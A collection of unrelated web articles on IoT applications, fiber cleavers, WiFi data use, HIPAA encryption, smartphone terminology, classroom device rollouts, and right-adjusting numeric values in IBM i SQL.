The IoT (Internet of Things) is a loose network of interconnected digital endpoints, such as consumer devices, networks, servers, applications, etc. While there is a huge variety of “Things” that make up the IoT, they all share the common trait of having the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.
To do this, each “thing” must, of course, be associated with unique identifiers (UIDs) to be picked out from the ocean of other devices and endpoints, such as an IP address. In its simplest form, an IoT ecosystem consists of two or more devices with the ability to collect data from their environment (users included). IoT devices can communicate this data to each other via an IoT gateway or upload it to other edge devices or the cloud to be processed and analyzed locally.
The IoT is ubiquitous with specific applications, or “Things”, being developed to tackle specific needs across all sectors.
Businesses have realized the potential advantages of operating in a way that utilizes the IoT to their benefit, such as:
- Enhancing customer experiences
- Operating more efficiently
- Harnessing more (consumer) data
- Improving decision making
- Speeding up service delivery
- Increasing adoption rates among consumers
In less consumer-oriented contexts, the goals of IoT are similar but may feature a shift in goals to:
- Improving employee productivity
- Enhancing visibility over processes and digital assets
- Improving access to real-time data
- Facilitating communication
An IoT ecosystem can be as complicated as mounted GPS systems on carrier fleet vehicles which communicates their locations to the central server. This server collates, organizes, and transfers the data to help coordinate assets, map or track routes, and provide decision-makers with the necessary real-time data to make business-critical decisions.
Or, it may be as simple as your home Amazon Echo, Google Home, or Apple HomePod helping you buy groceries from an online marketplace.
9 Specific IoT applications
1. Health & life sciences
Undoubtedly the most widespread use and awareness of IoT applications in this space are attributable to consumer wearables. And today, the most popular and ubiquitous type of wearable is undoubtedly the smartwatch.
The Galaxy range from Google, the Apple Watch series, and the various Fitbit devices need little introduction. In the cases of the Galaxy Wear and Apple Watch devices, these are powerful productivity tools and an extension of your smartphone with many of the same capabilities.
However, by far the most popular use for wearables is as fitness and activity trackers, spearheaded by companies like Fitbit.
The sophistication and features of these devices are growing by the wear. From heartrate monitors to sleep quality trackers to GPS and built-in WiFi/5G, we’ve only scratched the surface. However, the future of wearables may be devices that are even more intrinsically linked with us through embedded devices, such as Neuralink.
2. Consumer and home
The smart home has long been an ideal of tech fanatics but is now slowly becoming a reality.
You can find smart versions of almost all household appliances, from washing machines to fridges to wardrobe mirrors. Check out World of IoT Consumer and Smart Home.
Not only can they provide advanced functionality not available in conventional systems, but they can be interconnected and controlled via a single point of contact.
For example, consumer home assistants such as Google Home, Apple HomePod, and Amazon Echo can integrate with numerous other home appliances. Others may come with their dedicated smartphone or computer apps. These applications range from practical to luxurious. For example, they can help in the maintenance and control of fire alarm systems, monitoring energy/water consumption, or help to maintain the perfect climate control throughout your home.
3. Transport & logistics
While we might still be some way of completely eliminating your morning commute, traffic management is a field making great strides.
Most modern cars produced today are IoT devices in and of themselves with infotainment systems with features like seamless smartphone integration, GPS, and even internet connectivity.
Even by using apps like Google Maps and Waze, we are receiving information that makes our lives easier and sharing it with traffic monitoring systems.
However, we are also facing the advent of the “smart car,” pioneered by companies like Tesla. Automated vehicles might be the next step to achieve fully integrated traffic management systems.
Conventionally, we don’t think about farming and cutting-edge technology in the same vein.
Farmers are already using these technologies to give them access to unprecedented data and decision-making power.
For example, sensors that can detect various properties of the soil, such as moisture and acidity levels and nutrient availability, are already commonplace. This can help farmers determine which crops are best for the soil or to suitably prepare the soil. Similar devices can be used to gather and analyze data about the climate, short-term weather, etc.
Farmers can also benefit from a range of other IoT devices that span fleet tracking, inventory management, field observation, and even livestock monitoring. This has given rise to the discipline of “precision farming” and the concept of the “smart farm.”
5. Retail & hospitality
As an industry focus on providing the best user experiences possible, it’s only natural that this sector would also gravitate towards being more IoT-centric.
Electronic keys can be sent directly to your smartphone and used to open up hotel doors using QR codes. This can help reduce frustrating long check-in and check-out times as well as automate other interactions, such as ordering room service, requesting cleaning services, using the concierge, etc. This saves both the consumer’s and the host’s time and effort. Also, it eliminates many unnecessary human-to-human interactions.
IoT applications also give hospitality businesses unprecedented opportunities for personalised marketing, messaging, and tailored offers.
While not its originally intended purpose, these innovations are even more sensible in our post-pandemic world.
6. Energy-saving and the “Smart Grid”
This is not the only large-scale civil use of the IoT, but it has become one of the most topical.
Our collective conscience has never been more engaged regarding minimising our environmental footprint. Decreased and more efficient energy consumption is seen as one of the critical ways of achieving that goal.
From industrial power plants to communal city blocks, installing “smart” electricity meters with built-in sensors and IoT capability can help us more effectively monitor and control the flow of electricity.
The influx of data also helps improve predictive models about peak consumption times and other important trends. Furthermore, maintenance and repairs will be enhanced by more quickly and accurately detecting and identifying faults.
Consumer-facing applications can also provide individuals with the information to better understand exercise more control over their consumption patterns.
7. Buildings & construction
IoT applications are also being uncovered throughout the entire lifecycle of construction and ongoing building maintenance. The aim of these applications is mainly to increase productivity and efficiency while reducing operational costs.
Examples of these systems are manifold:
- Electronic building access control with entry/exit tracking
- Sensors connected to electrical/water supply systems to track usage and potential faults
- Automation and monitoring of various systems, such as HVAC, smoke alarms, elevators, etc.
These systems can be used in both residential and commercial properties, such as malls or office buildings.
Recently, the Industrial sector has emerged as the top IoT application area.
This is a highly competitive space, and the IoT, combined with automation and machine learning, is helping organisations stay competitive by reducing operational costs and increasing productivity/efficiency.
Wearables and augmented reality are increasingly utilised to help the workforce be productive and improve human resource management. Operators also benefit significantly from enhanced shop-floor monitoring, including real-time data from production equipment and inventory management systems.
In recent years, there has been massive innovation in robotics and industrial exoskeletons that also improve safety and productivity. And, it will be interesting to see how this inevitably integrates with the larger IoT ecosystem.
9. Security & public safety
The number of applications for IoT in the sphere of security and public safety is almost too numerous to mention.
Regarding the protection of private or restricted property, users can benefit from improved monitoring and surveillance thanks to advanced environmental sensors, drones, and connected video camera systems.
Public servants, such as police, firefighters, and paramedics, can benefit from better access to real-time information as well as IoT technology built into their police cars, fire trucks, and ambulances. Automatic gunshot detectors and robotic explosive “sniffers” are just some of the ways this can be used to combat violent crime or in combat situations.
As far as we’ve progressed, it’s clear that we’ve only seen the tip in terms of the variety, capability, and impact of the IoT on our lives. When implemented in tandem with other advancements in AI, automation, and next-gen networking, it truly has the potential to revolutionise the way we work and live drastically.
The advent of 5G is particularly crucial to further adoption and innovation in the IoT space. The growth of these interconnected devices has caused a surge in our demand for high-speed, reliable, and broadband connectivity. This is particularly true if we’re to reap the full benefits of real-time data and accelerated decision-making promised by IoT applications. | <urn:uuid:9ba20855-814e-424f-84f2-4b74a41d5e57> | CC-MAIN-2022-40 | https://www.iot-now.com/2021/09/01/112584-9-iot-applications-that-will-change-everything/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00555.warc.gz | en | 0.932691 | 2,219 | 2.796875 | 3 |
In the world of fiber splicing, fiber cleaver is an important tool that cleaves the fibers to be spliced precisely. It is the warranty of a good splicing because the quality of the splice will depend on the quality of the cleave. And high quality fiber breaks with clean surfaces are the yardstick for good fiber cleavers. This article will provide some knowledge about fiber cleavers.
In optical fiber, a cleave means a controlled break that intentionally creates a perfect flat end face which is perpendicular to the longitudinal axis of the fiber. Fiber optic cleaver is used in most production lines. It can give a precise cut at a cleave angle of 90 degrees to the fiber end. Cleavers are available for both single fiber or ribbon fibers.
Two kinds of fiber cleavers are often seen in the market. First is the pen-shaped scribe cleaver, which looks like a ballpoint pen. It has small wedge tip made of diamond or other hard materials. Scribe cleaver is a traditionally low-cost fiber cleaving tool using the scribe-and-pull method to cleave the fiber. The operator may scribe the fiber manually and then pull the fiber to break it. But it is difficult to achieve high cleaving accuracy by this tool.
Therefore, in order to solve the problem of accuracy, the precision cleaver is introduced to the industry. This might cost you much higher than the scribe cleaver, but your working speed and efficiency can be greatly improved since multiple fibers can be cleaved at one time. With the extensive applications of fusion splicers, precision cleavers are favored by operators to avoid splice loss.
Precision cleaver is the mechanical device, which looks a little difficult for novices to deal with. Here are some simple steps that you can follow when using the precision cleaver:
- Step one, open the fiber clamp.
- Step two, press down on the button and slide the carriage back.
- Step three, move the fiber slide back until it stops.
- Step four, clean the stripped fiber with a solution of greater than 91% ISO alcohol.
- Step five, place the stripped and cleaned fiber into the slot at the desired cleave length.
- Step six, while maintaining firm pressure on the buffer, move the fiber slide forward until it stops.
- Step seven, close the fiber clamp.
- Step eight, slide the carriage forward.
- Step nine, lift the fiber clamp.
- Step ten, move the fiber slide back.
- Step eleven, remove the fiber, which is now cleaved to the proper length.
- Step twelve, remove and properly dispose of the scrap fiber.
Make sure you comply with these precautions during the process of fiber cleaving:
- First, wear a pair of safety glasses. This can protect your eyes from accidental injury. It is highly recommended when handling chemicals and cleaving fiber.
- Second, be careful when using ISO alcohol. Keep the ISO alcohol away from heat, sparks and open flame. This is because the ISO alcohol is flammable under the flash point of 73° F. It can also cause irritation to eyes on contact. In case of eye contact, flush eyes with water for at least 15 minutes. Moreover, inhaling fumes may induce mild narcosis. In case of ingestion, consult a physician.
- Third, store cleaved glass fibers in proper place. Since cleaved glass fibers are very sharp and can pierce the skin easily. Do not let cut pieces of fiber stick to your clothing or drop in the work area where they can cause injury later. Use tweezers to pick up cut or broken pieces of the glass fibers and place them on a loop of tape kept for that purpose alone.
Having a qualified fiber cleaver enhances the cleaving precision and efficiency. Nowadays, precision cleaver has been widely applied to accurate fusion splicing. Proper investment is valuable for the long-term applications. If you want to get one for your project, FS.COM is a good place to go. | <urn:uuid:5616125a-f251-45b1-b5af-fa3bc20b1ab0> | CC-MAIN-2022-40 | https://www.chinacablesbuy.com/tag/fiber-splicing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00555.warc.gz | en | 0.926393 | 836 | 2.671875 | 3 |
Consumers use lots of data on their mobile devices. While half of consumers use less than 7 GB per month, data consumption is heavily skewed toward the upper end, recent Parks Associates research indicates. Among U.S. broadband households, mean data consumption is roughly 20 GB per month, with 14 GB used on WiFi and 6 GB through 3G/4G/LTE networks.
Consumers’ monthly WiFi data consumption increased by 40 percent from 2015 to 2016. While data use overall has been increasing, WiFi use has been increasing faster than mobile data. The use of WiFi is strongly correlated with the use of 4G/LTE data. As use of one increases, so does use of the other.
Even unlimited data plan holders use WiFi; one-quarter of them use more than 15 GB of WiFi data per month, based on Parks’ findings. This implies that there is a “data hungry” type of mobile user comprised of those who want to consume video content and other data-hungry services and are not particular about the kind of data they use.
In the Home
In the U.S., about 75 percent of broadband households use a home WiFi network, which equals 76 million home WiFi access points. Consumers can make their WiFi Internet connections in a number of ways — through DSL or fiber-optic broadband from a telephone company, cable high-speed Internet from a cable provider, satellite Internet from a satellite provider, or, increasingly, through WiFi hotspots powered by a device accessing a 3G/4G mobile network.
In addition to these more established WiFi solutions, fixed wireless broadband is beginning to emerge as a viable and robust technology. Fixed wireless broadband traditionally has offered last-mile service over a wireless connection using high-frequency radio signals. The older technology typically was limited to 10 Mbps of network bandwidth, required line-of-sight access between the subscriber and a ground station, and suffered from attenuation during the rain and fog.
However, newer experiments in the mmWave band, done in anticipation of 5G, have solved these issues to a large extent, allowing fixed wireless broadband to expand beyond its traditional offering.
Starry, a wireless startup, can deliver Gigabit-class Internet to the home over a distance of 1KM to 1.5 KM using mmWave technology in the 39-GHz band. Both Verizon and AT&T plan to launch a precommercial 5G network for fixed wireless service using mmWave spectrum later this year.
Out and About
WiFi use outside of the home also is popular with consumers. In most countries, the home WiFi and public hotspots are two different services. However, in the UK and a small number of European countries, a home WiFi router can broadcast two signals — one for the homeowner’s private use and the other for public use.
This hybrid model is made possible by the latest WiFi hotspot standards, which partition the WiFi channels into public and private use. Through this kind of technology, public WiFi hotspot numbers are increased dramatically in these countries, a benefit appreciated by wholesale and retail customers.
The U.S. market may not be well suited for this WiFi use case, because public WiFi hotspots in U.S. residential areas don’t attract many users. Comcast most recently launched its long-anticipated Xfinity mobile service, highlighting its WiFi footprint of 16 million access points. This figure appears to include its home hotspots in the residential area.
Time will tell how such home hotspots are being used, and whether such use can translate into meaningful subscriber gain for Comcast or other cable multiple system operators with similar WiFi assets.
Consumers’ appetite for mobile data will continue to increase at a faster speed, no matter the location, based on Parks’ research.
Monthly consumption of mobile data will top 49 exabytes, up from 7.2 exabytes recorded in December 2016, according to Cisco.
While mobile networks will be upgraded by then, this data tsunami nevertheless will pressure-test a mobile network’s limits, and offloading solutions like WiFi are expected to play an important role in mobile operators’ network densification strategy. | <urn:uuid:83c60df0-8ce7-4e51-bbc4-2dc7c98467c7> | CC-MAIN-2022-40 | https://www.linuxinsider.com/story/consumer-wifi-use-no-letup-in-sight-84520.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00555.warc.gz | en | 0.933357 | 852 | 2.640625 | 3 |
Understanding the HIPAA Encryption Requirement
In its original form, the Health Insurance Portability and Accountability Act (HIPAA) was intended to protect patient health information (PHI) privacy. Since the law was enacted in 1996 and as healthcare organizations changed their operating models to incorporate digital data sharing, the government encouraged interoperability for better patient care, and HIPAA expanded beyond paper files to include electronic PHI (ePHI).
Additionally, as these digital data sharing models continued to grow, so too did the types of organizations covered by HIPAA. Today, healthcare organizations and their business associates need to meet stringent compliance requirements to avoid hefty fines levied by the Department of Health and Human Services (HHS), the agency enforcing HIPAA compliance. Understanding the HIPAA encryption requirements gives healthcare organizations and their business associates a way to protect privacy for data both in-transit and at-rest.
Does HIPAA require encryption?
HIPAA consists of four separate “rules,” the Privacy Rule, Security Rule, Enforcement Rule, and Breach Notification Rule. In response to the increased digitalization of patient data, HHS announced a final Omnibus Rule in 2013, implementing additional provisions from the Health Information Technology for Economic and Clinical Health Act (HITECH).
Fitting the different pieces of HIPAA together can be daunting because the requirements are listed in various documents aggregated across over twenty years.
Encryption, while not technically “required” by either HIPAA or HITECH, is considered an “addressable” control. Addressable does not mean the control is optional, but it does mean that a covered entity can determine whether an implementation is reasonable and appropriate. If the organization determines that an “addressable” control is not reasonable and appropriate, then it must find an alternative compensating control that is reasonable and appropriate to meet the addressable control’s purpose.
Security Rule Requirements
The Security Rule is divided into administrative, technical, and physical safeguards. Under Security Rule technical safeguards, HIPAA notes that encryption and decryption are addressable implementations as part of the access and transmission security measures.
Connection to National Institute of Standards and Technology (NIST)
Increasingly, healthcare organizations, business associates, and patients turned to electronic data sharing models. In 2014, NIST released its Cybersecurity Framework (NIST CSF) and in 2016 published the “HIPAA Security Rule Crosswalk to NIST Cybersecurity Framework”. The document maps HIPAA Security Rule standards and implementations to NIST CSF subcategories while also cross-mapping to additional frameworks such as the International Organization for Standardization (ISO), Control Objectives for Information and Related Technology (COBIT), and Council on Cybersecurity Critical Security Controls (CCS CSC). The Crosswalk document includes the following:
- PR.DS-1: Data-at-rest is protected
- PR.DS-2: Data-in-transit is protected.
The Crosswalk then aligns across various “relevant control mappings,” including CCS CSC, COBIT, ISO 27001:2013, NIST SP 800-53, and HIPAA Security Rule. Since 2016, several of these control mappings have changed. For example, CCS CSC is now called the Center for Internet Security (CIS) controls while COBIT and ISO 27000 have both been updated.
Thus, while HIPAA may not specifically require encryption, the intersection between the related control mappings and the need to protect data-at-rest and data-in-transit indicates that encryption would be considered a best practice.
What level of encryption is required for HIPAA?
With the intricate level of cross-mapping between the different compliance requirements, the level of encryption required to comply with HIPAA and HITECH can be overwhelming. For example:
- Subcontrol 15.7: Leverage the Advanced Encryption Standard (AES) to Encrypt Wireless Data
- Subcontrol 18.5: Use only Standardized and Extensively Reviewed Encryption Algorithms
- ISO 27000: AES-256 encryption
- NIST 800-53 SC-12 Cryptographic Key Establishment and Management: establish and manage cryptographic keys for required cryptography employed within the information system.
Of the listed controls, only ISO 27000 applies a specific encryption standard, AES-256 encryption, which is currently considered the strongest level of encryption.
Is end-to-end encryption HIPAA compliant?
Experts consider end-to-end encryption (E2EE) the most secure way to share data electronically. With E2EE, data is encrypted both on the user’s device (at-rest) and as it travels to another end user (in-transit). This protects information and enables HIPAA compliance in several ways:
- Lost devices: Even if a device is lost, the at-rest encryption ensures that information is not readable.
- Cloud storage: Even if cybercriminals gain unauthorized access, the data will be unreadable.
- Data sharing: Even if a cybercriminal manages to execute a man-in-the-middle attack successfully, the data will be unreadable.
- Accidental access: Even if an authorized user gains access to data without the appropriate decryption, the data will be unreadable.
With E2EE, health organizations and business associates can better protect data. With easy-to-deploy and use encryption solutions, E2EE is a reasonable and appropriate data-in-transit and data-at-rest protection implementation.
How end-to-end encryption enables secure telehealth
The rise of telehealth as part of healthcare’s response to the COVID-19 stay-at-home orders increases the value of E2EE. Moreover, many healthcare providers will likely continue to engage in telehealth practices in the post-COVID era. However, cybercriminals continue to deploy attacks against telehealth providers. According to research, IT staff at the most popular telehealth application found a 30% increase overall in security alerts, indicating increased cybercriminal attack attempts.
With telehealth likely to be integrated into traditional healthcare, providers and business associates should look for solutions that protect data and enable HIPAA compliance. To maintain various administrative tasks, including follow-up calls or billing, employees may share documents using collaborative tools or email. Moreover, as the healthcare industry continues to evolve its telehealth practices, documents and other files containing ePHI may need to be circulated among practitioners. For example, a practitioner may keep a list of patients with outstanding bills in a spreadsheet. Sharing the spreadsheet via email becomes a privacy and security risk for two reasons. First, cybercriminals may attempt to intercept the communication. Second, an employee may accidentally email the spreadsheet to an incorrect email address. E2EE can mitigate the risks associated with both of these hypotheticals.
Atakama: Easy end-to-end encryption for healthcare organizations and business associates
As healthcare organizations and business associates look to continue telehealth practices, E2EE becomes a fundamental control for mitigating security and privacy risks. Unfortunately, many encryption tools can be cumbersome to deploy and difficult for end-users, ultimately leaving data unprotected when users circumvent encryption policies.
Atakama’s encrypted file transfer solution enables HIPAA compliance with an easy-to-use approach that increases end-user adoption rates. Atakama protects files with AES-256 standard encryption. Unlike traditional tools that require passwords for decrypting data, Atakama’s solution pushes an approval request to the sender’s device, giving the sender the ability to accept or deny the decryption request. Since senders need to approve the decryption request, Atakama ensures that data remains encrypted end-to-end and does so without placing a burden on the users.
Additionally, with Atakama’s Application Level Database Encryption solution, organizations can secure data-at-rest on their servers and data-in-transit when accessed through an application. Atakama’s solution encrypts data within an application, as it is entered and before being transmitted to the database. When users approve a data request, the data is decrypted making non-public sensitive data viewable while still encrypted. This process ensures that data remains encrypted on the server at all times, decrypted only for the particular user within their browser when they call the information.
For more information about how Atakama can enable your organization’s long-term telehealth goals, contact us for a demo today. | <urn:uuid:814f2c61-5cb3-4a8d-a33f-4996982a512c> | CC-MAIN-2022-40 | https://news.atakama.com/understanding-the-hipaa-encryption-requirement | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00555.warc.gz | en | 0.904098 | 1,774 | 2.515625 | 3 |
Smartphones are evolving, bringing new technical jargon that you need to know. That’s why we’ve created this handy guide, explaining all the specialist terms that you need to know for a successful future in the mobile hardware industry. Following our Connectivity and IP Communications guides, we have compiled a list of everything you need to know about smartphones!
4G is short for fourth generation broadband cellular network technology. It’s what allows customers outside of WiFi to make calls, send texts and use data. Most devices on the market will currently be 4G enabled.
5G is the next generation of mobile connectivity that will give customers greater speeds than 4G. It was first introduced in May 2019 and will have a huge impact on the way we live and work. The number of 5G ready devices is beginning to expand and they will eventually be the default.
AMOLED is a display technology and stands for Active Matrix Organic Light Emitting Diodes. It is a type of OLED display used in smartphones. HD+ Dynamic AMOLED technology ensures a crisp, vibrant viewing experience, as seen on devices such as the Galaxy S20 Ultra from Samsung.
Android is a mobile operating system from Google. The key difference between Android and Apple’s OS is Android is open source, meaning developers can modify and customise the OS for each phone.
Aperture is essentially an opening of the camera lens through which light passes. The more light that passes through, the sharper the image. It is usually measured in F-stops and has a direct bearing on the detailing and contrast of the photograph. The ability to set the aperture on a smartphone camera is relatively new.
A bezel is the border between the phone’s screen and frame. Modern smartphones often come with a smaller bezel, allowing for more screen real estate.
Bluetooth is a wireless technology standard used for exchanging data, such as media files, between mobile devices. It operates over short distances using radio waves. In mobile device terms, it is now permitting file share and connectivity to external devices, such as wireless speakers or headphones.
A dual lens set up on a smartphone simply means there is two lenses instead of one. In most phones it combines wide-angle and telephoto configuration.
A dual-sim device is simply a device that can operate two separate sim cards concurrently. This is useful for users wanting two distinct numbers while only needing one device. For example having two separate SIMs for business and personal use, on one phone.
In smartphone terms, a device that is dustproof is simply resistant to dust, meaning it won’t be affected by particles infiltrating the crevices of the phone. This is a standard feature of many rugged phones.
A drop-proof device is simply a phone that is resistant to damage when dropped. The phone drop test is an industry standard method for measuring how drop-proof a phone is.
Facial Recognition Technology
Commonly known as Face ID on Apple Devices, or Face Unlock on others, facial recognition technology uses biometrics to map facial features and verify users. It is commonly used to unlock phones and authorise payments.
Fingerprint scanners work as you would expect, reading a user’s fingerprint in order to unlock phones, make purchases and confirm downloads. It is known as Touch ID on iPhones and is argued to be more secure than facial recognition technology on smartphones as fingerprints cannot be impersonated.
Gorilla Glass is a brand of chemically strengthened glass developed and manufactured by Corning. It is often used in screen protectors to help reduce scratches and cracks in the device screen.
The Global Positioning System (GPS) is a satellite-based navigation system made up of at least 24 satellites. In smartphones, it allows people to navigate their journey in maps, as well as capturing location data for personalised offers.
High Dynamic Range (HDR)
High Dynamic Range, or HDR, is a common feature on both iOS and Android phones. It helps users take better quality photos by capturing multiple photos at different exposures – darker, normal and lighter, with just one tap of a button. It then merges them into one image so none of the detail is lost. This means highlights get brighter and shadows get darker giving users a high quality final image.
iOS is the mobile operating system created and developed by Apple, used on iPhones and iPads.
An IP rating, or Ingress Protection Rating, classifies the degrees of protection against both solids and liquids in electrical enclosures, such as smartphones and tablets. IP ratings are specified on a number of devices currently in market.
mAh is milliampere Hour which measures electric power over time. The higher the mAh set against a battery on a smartphone, the longer it will last through the day.
MMS is an acronym for Multimedia Messaging Service, a standard way to send text messages that include multimedia content to and from a mobile device over a cellular network.
NFC stands for Near Field Communication and enables short-range communication between compatible devices. It enables tap-and-go services, such as Apple and Google Pay.
Unlike other screen technologies, OLED, or Organic Light Emitting Diode, uses organic compounds to create colours. Each colour represented on the screen has a different mixture of elements. Many smartphones now utilise an OLED display to make images, videos and icons look crisp and vibrant.
Optical Image Stabilisation, or OIS, is a common reference point for smartphone manufacturers when it comes to the camera. With OIS, part of the lens physically moves to counteract any camera slight movement when taking a picture, reducing the effect of shaky hands and helping to prevent blurry images.
Portrait Mode uses depth of field to determine how much of the photograph is in focus. This feature results in photos with blurred backgrounds and sharper focus on the subject.
SMS is an acronym for Short Message Service. It is the most widely used type of text messaging carried over a cellular network.
An ultra-wide camera lens allows users to capture more in their photos. It displays a wider field of view than our own vision, with as much as 123 degrees promised on selected smartphones. It’s perfect for users who want to capture more in a single shot.
Waterproof technology allows devices to survive in the wettest conditions. The industry standard Ingress Protection (IP) rating system proves devices can handle complete submersion in water. IP68 waterproof phones are the most reliable to use in water, whether in the rain or fully submerged.
A WiFi hotspot is an area with an accessible wireless network. | <urn:uuid:19a421ef-e36d-465d-815b-5e93033c8ce6> | CC-MAIN-2022-40 | https://digitalwholesalesolutions.com/2020/03/it-telecoms-jargon-buster-smartphones/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00555.warc.gz | en | 0.916684 | 1,448 | 2.890625 | 3 |
Technology has the potential to transform the way we live our lives. Already we are seeing changes in the way we work, play, and interact on a social level as a direct result of developing technology. Now it is influencing the way we teach, too. The 1:1 implementation strategy involves equipping each pupil with a tablet or portable device, effectively giving them their own personal workstation from which to write, research, and learn.
The 1:1 implementation strategy offers the potential for schools to transform education, but if you are going to maximize these gains you must first take stock and analyze the hows and whys of its benefits.
Here are three essential aspects:
1. Choosing the Right Device
While every school shares the end goal of educating its pupils, methods and educational priorities can vary wildly between establishments. As typically traditional installations, many schools will have accrued a range of habits and routines established over long years of teaching. It is therefore important to choose the most suitable model when deciding to equip your pupils with devices.
There is a staggering array of notebooks, tablets, iPads and e-readers available on a constantly growing market. Devices can vary according to brand or intended application. Have you picked a reading device, or one that your pupils can actively work on? For 1:1 implementation, it will need to be the latter. What apps does it support, and does it have sufficient memory? Choosing the device that best complements your school’s practices can be challenging.
How Should You Decide?
You are under no obligation to make the decision alone. Ask teaching staff for their input, as they are responsible for interacting with the pupils in the classroom. They will also be responsible for overseeing and engaging the pupils with the new devices, so their opinions and preferences are critical.
Parental input should also be considered. It is their children who will be using the devices. What are their privacy concerns? Are the devices protected against improper use? And if you are expecting parents to contribute to payment or insurance costs, what are their financial boundaries?
2. Examine Costs
Costs is always a factor when it comes to technology. The device needs to be affordable; for example, most school budgets will not accommodate for the purchase of two thousand state-of-the-art iPads. Moreover, school children do not need to learn on state-of-the-art devices. Find a compromise between quality and cost. Research devices by appropriate attributes such as durability, memory, and transportability rather than big brand names and aesthetics. Accidents happen, especially in the hands of school children. Value practicality.
Aside from the initial cost, there are insurance and repair expenses to consider. You might want to establish charges for lost or damaged devices, although these will rarely cover the cost the device itself. Technology is valuable, and when treated flippantly can be a huge sinkhole in your finances. Taking the time to plan and analyze your expenditures is critical to successful 1:1 implementation.
3. Impact on Teaching Staff
As an arena typically dominated by tradition, reactions to technological innovation can vary. Many staff will welcome the implementation of devices in the classroom, recognizing their potential for increased efficiency, better learning, and improved classroom interaction. However, other staff members might react with hesitation.
Everyone’s teaching methods are different, and everyone has varying levels of technical understanding. A teacher who does not feel comfortable with their own computing knowledge is going to experience hesitation, even resistance, at the thought of having to lead a classroom full of such devices. They might also wonder how the implementation of such devices affects their teaching schedule. This is why it is so important to communicate with, train, and prepare your teaching staff before the use of the devices goes live.
Preparation and Support
Upskilling your staff is one of the easiest and most efficient ways of integrating technology into the classroom. Consider hiring an information and communications technology professional who can fulfill this role by supporting and training your staff.
Teachers who understand how a device works will understand its wider implications for the classroom. They will be able to identify how the technology can be used to complement their curriculum and implement it accordingly. Their technical knowledge will have increased, but also their confidence in the classroom and their attitude toward the technology itself. This will carry over to their pupils.
When implemented correctly, 1:1 implementation can have a transformative effect on classrooms, bringing education to life in a way that has never been possible before now. By carefully considering your approach to technological integration, you will be able to turn your school into a digital web of information, ideas, work shared, and dreams made.
To talk to iSupport about how we can help you improve your business’s IT support, call us at (888) 494-7638 or contact us here. | <urn:uuid:af66d95b-dd74-4708-aee2-d36cfea9b22e> | CC-MAIN-2022-40 | https://www.isupport.com/blog/the-essential-components-of-successful-11-implementation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00555.warc.gz | en | 0.9581 | 989 | 3.171875 | 3 |
The SPACE Function Takes Up a Lot of Space
October 18, 2006 Hey, Ted
I have to build a file for input to another system. All fields are fixed-length, and numeric values are to be edited and right-adjusted. SQL’s CHAR function takes care of the editing requirement, but the result is left-adjusted. How do I right-adjust an edited numeric value? Or will I have to rewrite my program using native I/O operations?
On the surface, this seemed like an easy request. It turned to be a little more complicated than I had thought.
I suggested Sarah use the SPACE function to generate enough leading blanks to force right alignment. For example, the following expression right-adjusts an edited version of field ABUBAL within an area of twenty bytes.
SELECT space(20 - length(trim(char(ABUBAL))))||trim(char(ABUBAL)), ...
The SPACE function takes one argument–the number of spaces to be generated. Suppose that the edited ABUBAL occupies seven bytes. SPACE returns 13 blanks, which are concatenated to the edited ABUBAL.
IMHO, this expression deserves its own spot in the county landfill. However, it works. Well, it works up to a point. Here was Sarah’s final query.
INSERT INTO ABMASTF SELECT ABTRNS, ABCUS, ABTDT, space(20 - length(trim(char(ABUBAL))))||trim(char(ABUBAL)), digits(ABNDD), space(20 - length(trim(char(ABTAMT))))||trim(char(ABTAMT)), ABREF, ABPONO, ABDIV, space(20 - length(trim(char(ABTAX))))||trim(char(ABTAX)), space(20 - length(trim(char(ABFRGT))))||trim(char(ABFRGT)), space(20 - length(trim(char(ABOTH))))||trim(char(ABOTH)), ABTTYP, ABCHKN, ABPNUM, ABRCDE, ABSLSN, ABSHPT, ABSRCI, ABTCCD, space(20 - length(trim(char(ABTCAM))))||trim(char(ABTCAM)), space(20 - length(trim(char(ABTCBA))))||trim(char(ABTCBA)), space(20 - length(trim(char(ABLCAM))))||trim(char(ABLCAM)), space(20 - length(trim(char(ABLCBA))))||trim(char(ABLCBA)), ABDIVC FROM ABmast
At this point, her SQL command cancelled with error message SQL0101.
SQL statement too long or complex. … 3 – The sum of the lengths of the non-LOB columns in a select list, table, view definition, or user defined table function is greater than 32766 or the definition contains a LOB and the sum of the lengths specified on the ALLOCATE clause for varying-length fields and the non-varying field lengths is greater than 32740. The maximum length is reduced if any of the columns are varying-length or allow null values.
I knew the field lengths did not add up to 32,766 bytes, so I contacted IBM for help with this one. Thanks to Sue Ramono and Jeff Tenner, I learned that the SPACE function returns a 4000-byte result. Sue and Jeff suggested using the SUBSTR (substring) function instead.
substr(' ',1, 20-length(trim(char(ABUBAL)))||trim(char(ABUBAL)),
The first argument is twenty spaces surrounded by single quotes. The second argument tells the position of the first blank to return (i.e., position one), and the third argument is the number of blanks to return. It’s still ugly, but SUBSTR uses less resources. (In all fairness, I should point out that SQL is designed to retrieve data, not format it.)
While I was waiting to hear back from IBM, I toyed with a user-defined function to right-adjust a value. Here is the RADJ function, hastily thrown together and unproven in production.
create function mylib/radj (inString varchar(256), inLength integer) returns varchar(256) language SQL contains SQL deterministic returns null on null input no external action begin if inLength < length(trim(inString)) then signal sqlstate '22003' set message_text = 'Length is invalid.'; end if; return (space(inLength-length(trim(inString))) concat trim(inString)); end
RADJ takes two arguments–the character value to be right-adjusted and the size of the area in which it is to be right-adjusted. I was able to run queries with many RADJ functions without getting the SQL0101 error.
SELECT radj(char(ABUBAL),20) ...
